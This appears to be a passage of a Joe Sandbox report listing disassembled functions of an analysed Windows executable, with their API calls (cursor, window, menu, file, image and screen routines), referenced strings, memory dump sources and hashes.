                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: __wcsnicmp
                                                                    • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                    • API String ID: 1038674560-1810252412
                                                                    • Opcode ID: c3c7ba96b5ac31392d4c4f6cf3c4485ea122de47fdcec48a85b18e0368f4a927
                                                                    • Instruction ID: ee8c30b3d723fed9eed73c73856c7f3ef462bf103ae581aa99bc251d81cb985c
                                                                    • Opcode Fuzzy Hash: c3c7ba96b5ac31392d4c4f6cf3c4485ea122de47fdcec48a85b18e0368f4a927
                                                                    • Instruction Fuzzy Hash: F131F231648219E6DB00FAA4DE43EBEB7A59F50750F30002AF8C27B5A5FE256B049651
                                                                    APIs
                                                                    • LoadCursorW.USER32(00000000,00007F8A), ref: 01045013
                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 0104501E
                                                                    • LoadCursorW.USER32(00000000,00007F03), ref: 01045029
                                                                    • LoadCursorW.USER32(00000000,00007F8B), ref: 01045034
                                                                    • LoadCursorW.USER32(00000000,00007F01), ref: 0104503F
                                                                    • LoadCursorW.USER32(00000000,00007F81), ref: 0104504A
                                                                    • LoadCursorW.USER32(00000000,00007F88), ref: 01045055
                                                                    • LoadCursorW.USER32(00000000,00007F80), ref: 01045060
                                                                    • LoadCursorW.USER32(00000000,00007F86), ref: 0104506B
                                                                    • LoadCursorW.USER32(00000000,00007F83), ref: 01045076
                                                                    • LoadCursorW.USER32(00000000,00007F85), ref: 01045081
                                                                    • LoadCursorW.USER32(00000000,00007F82), ref: 0104508C
                                                                    • LoadCursorW.USER32(00000000,00007F84), ref: 01045097
                                                                    • LoadCursorW.USER32(00000000,00007F04), ref: 010450A2
                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 010450AD
                                                                    • LoadCursorW.USER32(00000000,00007F89), ref: 010450B8
                                                                    • GetCursorInfo.USER32(?), ref: 010450C8
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Cursor$Load$Info
                                                                    • String ID:
                                                                    • API String ID: 2577412497-0
                                                                    • Opcode ID: c5d003450d74b4810474b77f568486f51d5f22a02e5da4bd6d92bfb050f108aa
                                                                    • Instruction ID: 7a70447a4c6d8c855cd1782e7fd7f09603f7e8f8c763f03bb288d29b74298332
                                                                    • Opcode Fuzzy Hash: c5d003450d74b4810474b77f568486f51d5f22a02e5da4bd6d92bfb050f108aa
                                                                    • Instruction Fuzzy Hash: C931F4B1D4831A6BDF609FB68C8995FBFE8FF04750F50453AA54DE7280DA7865008F91
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 0105A259
                                                                    • DestroyWindow.USER32(?,?), ref: 0105A2D3
                                                                      • Part of subcall function 00FD7BCC: _memmove.LIBCMT ref: 00FD7C06
                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0105A34D
                                                                    • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0105A36F
                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0105A382
                                                                    • DestroyWindow.USER32(00000000), ref: 0105A3A4
                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00FD0000,00000000), ref: 0105A3DB
                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0105A3F4
                                                                    • GetDesktopWindow.USER32 ref: 0105A40D
                                                                    • GetWindowRect.USER32(00000000), ref: 0105A414
                                                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0105A42C
                                                                    • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0105A444
                                                                      • Part of subcall function 00FD25DB: GetWindowLongW.USER32(?,000000EB), ref: 00FD25EC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                    • String ID: 0$tooltips_class32
                                                                    • API String ID: 1297703922-3619404913
                                                                    • Opcode ID: 717ad4bba265574d223142f8f09c60bac83083441333d08bf008fa8bd0a3d799
                                                                    • Instruction ID: 4eb0b9b016f6ee46d4fccadc54391a1858643bdeea53345a33078a0dce05c0c2
                                                                    • Opcode Fuzzy Hash: 717ad4bba265574d223142f8f09c60bac83083441333d08bf008fa8bd0a3d799
                                                                    • Instruction Fuzzy Hash: DC717E70240205AFEB61DF28CC49F6B7BE5FB88304F04465DF9C59B2A1DB7AA902CB51
                                                                    APIs
                                                                      • Part of subcall function 00FD2612: GetWindowLongW.USER32(?,000000EB), ref: 00FD2623
                                                                    • DragQueryPoint.SHELL32(?,?), ref: 0105C627
                                                                      • Part of subcall function 0105AB37: ClientToScreen.USER32(?,?), ref: 0105AB60
                                                                      • Part of subcall function 0105AB37: GetWindowRect.USER32(?,?), ref: 0105ABD6
                                                                      • Part of subcall function 0105AB37: PtInRect.USER32(?,?,0105C014), ref: 0105ABE6
                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 0105C690
                                                                    • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0105C69B
                                                                    • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0105C6BE
                                                                    • _wcscat.LIBCMT ref: 0105C6EE
                                                                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0105C705
                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 0105C71E
                                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 0105C735
                                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 0105C757
                                                                    • DragFinish.SHELL32(?), ref: 0105C75E
                                                                    • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0105C851
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                    • API String ID: 169749273-3440237614
                                                                    • Opcode ID: c0506696cfa41110a398bff7964ec97bfaa519b1819a8ac8cba608479f97d028
                                                                    • Instruction ID: 5241e5f0e3b0087592d7bd8215036484fc910bd50fbadd47e88bd89781388bdb
                                                                    • Opcode Fuzzy Hash: c0506696cfa41110a398bff7964ec97bfaa519b1819a8ac8cba608479f97d028
                                                                    • Instruction Fuzzy Hash: A0615771108301AFDB11EF64CC85DAFBBE9EF88750F00091EF5D1962A1DB75AA09DB62
                                                                    APIs
                                                                    • VariantInit.OLEAUT32(00000000), ref: 01037D5F
                                                                    • VariantCopy.OLEAUT32(00000000,?), ref: 01037D68
                                                                    • VariantClear.OLEAUT32(00000000), ref: 01037D74
                                                                    • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 01037E62
                                                                    • __swprintf.LIBCMT ref: 01037E92
                                                                    • VarR8FromDec.OLEAUT32(?,?), ref: 01037EBE
                                                                    • VariantInit.OLEAUT32(?), ref: 01037F6F
                                                                    • SysFreeString.OLEAUT32(00000016), ref: 01038003
                                                                    • VariantClear.OLEAUT32(?), ref: 0103805D
                                                                    • VariantClear.OLEAUT32(?), ref: 0103806C
                                                                    • VariantInit.OLEAUT32(00000000), ref: 010380AA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                                    • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                    • API String ID: 3730832054-3931177956
                                                                    • Opcode ID: e1484e499b55de31952d3add4afc02c521ae96846d497a6bad00ff0b33d458f8
                                                                    • Instruction ID: 926bb2e984307a80336146abc854480af2db0f0f0ac886eb5a37f8cd567a39aa
                                                                    • Opcode Fuzzy Hash: e1484e499b55de31952d3add4afc02c521ae96846d497a6bad00ff0b33d458f8
                                                                    • Instruction Fuzzy Hash: 43D117B1600606EBDF10AF65D848B7EBBF9BF85300F048596F5859B284DF79E840CBA1
                                                                    APIs
                                                                    • CharUpperBuffW.USER32(?,?), ref: 01054424
                                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0105446F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: BuffCharMessageSendUpper
                                                                    • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                    • API String ID: 3974292440-4258414348
                                                                    • Opcode ID: 9ea3a7c451ddfbf3640690da4c905848e0706026533197ca63b726c51da1cc57
                                                                    • Instruction ID: c19c872abc9495cc1f416a348229cc3a352284f046f6951e319bf30996487a9f
                                                                    • Opcode Fuzzy Hash: 9ea3a7c451ddfbf3640690da4c905848e0706026533197ca63b726c51da1cc57
                                                                    • Instruction Fuzzy Hash: DC919D302047118BCB04FF14C851AAEB7E2AF94754F48485DECD69B3A2DB79EC49DB91
                                                                    APIs
                                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0105B8B4
                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,010591C2), ref: 0105B910
                                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0105B949
                                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0105B98C
                                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0105B9C3
                                                                    • FreeLibrary.KERNEL32(?), ref: 0105B9CF
                                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0105B9DF
                                                                    • DestroyIcon.USER32(?,?,?,?,?,010591C2), ref: 0105B9EE
                                                                    • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0105BA0B
                                                                    • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0105BA17
                                                                      • Part of subcall function 00FF2EFD: __wcsicmp_l.LIBCMT ref: 00FF2F86
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                    • String ID: .dll$.exe$.icl
                                                                    • API String ID: 1212759294-1154884017
                                                                    • Opcode ID: 23a450dd9a02eaaeb38cce6d7046e64b37f8dca615845dfd22f5616634c5e7e8
                                                                    • Instruction ID: 79734d28f541dfb41e2add011ff96ecc38e89ede59d0367f80fc1d5ca70be953
                                                                    • Opcode Fuzzy Hash: 23a450dd9a02eaaeb38cce6d7046e64b37f8dca615845dfd22f5616634c5e7e8
                                                                    • Instruction Fuzzy Hash: B361BC71900219BAEB94DF68CC45BBF7BA9FB08710F10414AFD95D61C1DB79AA80DBA0
                                                                    APIs
                                                                      • Part of subcall function 00FD9837: __itow.LIBCMT ref: 00FD9862
                                                                      • Part of subcall function 00FD9837: __swprintf.LIBCMT ref: 00FD98AC
                                                                    • CharLowerBuffW.USER32(?,?), ref: 0103A3CB
                                                                    • GetDriveTypeW.KERNEL32 ref: 0103A418
                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0103A460
                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0103A497
                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0103A4C5
                                                                      • Part of subcall function 00FD7BCC: _memmove.LIBCMT ref: 00FD7C06
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                    • API String ID: 2698844021-4113822522
                                                                    • Opcode ID: 137ecfa76d71dbf405e6ab5b2a93dccfe4d791f66323523dfe716520e0aeed6d
                                                                    • Instruction ID: 07e0f6905b8aec2ffd0648e2596d41b715c7999856eeccdefdce59934b135892
                                                                    • Opcode Fuzzy Hash: 137ecfa76d71dbf405e6ab5b2a93dccfe4d791f66323523dfe716520e0aeed6d
                                                                    • Instruction Fuzzy Hash: C65139712083059FC700EF25C99186AB7E9EF88718F44885EF8D69B262DB35ED09DB52
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,0100E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 0102F8DF
                                                                    • LoadStringW.USER32(00000000,?,0100E029,00000001), ref: 0102F8E8
                                                                      • Part of subcall function 00FD7DE1: _memmove.LIBCMT ref: 00FD7E22
                                                                    • GetModuleHandleW.KERNEL32(00000000,01095310,?,00000FFF,?,?,0100E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 0102F90A
                                                                    • LoadStringW.USER32(00000000,?,0100E029,00000001), ref: 0102F90D
                                                                    • __swprintf.LIBCMT ref: 0102F95D
                                                                    • __swprintf.LIBCMT ref: 0102F96E
                                                                    • _wprintf.LIBCMT ref: 0102FA17
                                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0102FA2E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                                    • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                    • API String ID: 984253442-2268648507
                                                                    • Opcode ID: 6af9ba9b5a4f910a65032128788258e04ec03d6144330e93bec7221ebb6da32f
                                                                    • Instruction ID: 5614410358a3894b1f6f95976345a79bc191bbaea077111674967749910e53d8
                                                                    • Opcode Fuzzy Hash: 6af9ba9b5a4f910a65032128788258e04ec03d6144330e93bec7221ebb6da32f
                                                                    • Instruction Fuzzy Hash: E5419F7280421EAACF04FFE0DD86DEEB779AF14340F540056F645BA191EA396F09DB61
                                                                    APIs
                                                                    • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,01059207,?,?), ref: 0105BA56
                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,01059207,?,?,00000000,?), ref: 0105BA6D
                                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,01059207,?,?,00000000,?), ref: 0105BA78
                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,01059207,?,?,00000000,?), ref: 0105BA85
                                                                    • GlobalLock.KERNEL32(00000000), ref: 0105BA8E
                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,01059207,?,?,00000000,?), ref: 0105BA9D
                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0105BAA6
                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,01059207,?,?,00000000,?), ref: 0105BAAD
                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,01059207,?,?,00000000,?), ref: 0105BABE
                                                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,01062CAC,?), ref: 0105BAD7
                                                                    • GlobalFree.KERNEL32(00000000), ref: 0105BAE7
                                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 0105BB0B
                                                                    • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0105BB36
                                                                    • DeleteObject.GDI32(00000000), ref: 0105BB5E
                                                                    • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0105BB74
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                    • String ID:
                                                                    • API String ID: 3840717409-0
                                                                    • Opcode ID: e51108ac123b12b8a8ce4ecc63c623ec59aff2b1f893d084768f2ea9550c3cb1
                                                                    • Instruction ID: ecdfa28aaf714a105a8de844fa02dc7b39b8b8785258f077581693e91e3465f9
                                                                    • Opcode Fuzzy Hash: e51108ac123b12b8a8ce4ecc63c623ec59aff2b1f893d084768f2ea9550c3cb1
                                                                    • Instruction Fuzzy Hash: 00416775600309AFDB619F69DC88EABBBF9FF89711F104058F989D7254C779AA01CB20
                                                                    APIs
                                                                    • __wsplitpath.LIBCMT ref: 0103DA10
                                                                    • _wcscat.LIBCMT ref: 0103DA28
                                                                    • _wcscat.LIBCMT ref: 0103DA3A
                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0103DA4F
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0103DA63
                                                                    • GetFileAttributesW.KERNEL32(?), ref: 0103DA7B
                                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 0103DA95
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0103DAA7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                    • String ID: *.*
                                                                    • API String ID: 34673085-438819550
                                                                    • Opcode ID: d6c987923a5b1657b91cc7c0251398ae427aca553ae3a89110bea46591c1afe4
                                                                    • Instruction ID: 868efb789e188a6b670377d6e9481490799b7163b50b40f19a07d11a83e7b751
                                                                    • Opcode Fuzzy Hash: d6c987923a5b1657b91cc7c0251398ae427aca553ae3a89110bea46591c1afe4
                                                                    • Instruction Fuzzy Hash: 2981AF715082419FCB64EFA8C8409AEB7E9AFC9310F88486EF9C9C7211E734D945CB52
                                                                    APIs
                                                                      • Part of subcall function 00FD2612: GetWindowLongW.USER32(?,000000EB), ref: 00FD2623
                                                                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0105C1FC
                                                                    • GetFocus.USER32 ref: 0105C20C
                                                                    • GetDlgCtrlID.USER32(00000000), ref: 0105C217
                                                                    • _memset.LIBCMT ref: 0105C342
                                                                    • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0105C36D
                                                                    • GetMenuItemCount.USER32(?), ref: 0105C38D
                                                                    • GetMenuItemID.USER32(?,00000000), ref: 0105C3A0
                                                                    • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0105C3D4
                                                                    • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0105C41C
                                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0105C454
                                                                    • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0105C489
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                    • String ID: 0
                                                                    • API String ID: 1296962147-4108050209
                                                                    • Opcode ID: be1fdf061d0eb7e68884ca19f1bd3e9318a06c05bbb78ee8717a79727e7cdfb7
                                                                    • Instruction ID: eb47b37130210c1fb59ea71c59fa0cd5cf585056a630537ef58f3f30d2db82c4
                                                                    • Opcode Fuzzy Hash: be1fdf061d0eb7e68884ca19f1bd3e9318a06c05bbb78ee8717a79727e7cdfb7
                                                                    • Instruction Fuzzy Hash: CC819E701083059FE7A1CF18C984A6BBBE8FB88754F00496EFED597292CB75D904CB62
                                                                    APIs
                                                                    • GetDC.USER32(00000000), ref: 0104738F
                                                                    • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0104739B
                                                                    • CreateCompatibleDC.GDI32(?), ref: 010473A7
                                                                    • SelectObject.GDI32(00000000,?), ref: 010473B4
                                                                    • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 01047408
                                                                    • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 01047444
                                                                    • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 01047468
                                                                    • SelectObject.GDI32(00000006,?), ref: 01047470
                                                                    • DeleteObject.GDI32(?), ref: 01047479
                                                                    • DeleteDC.GDI32(00000006), ref: 01047480
                                                                    • ReleaseDC.USER32(00000000,?), ref: 0104748B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
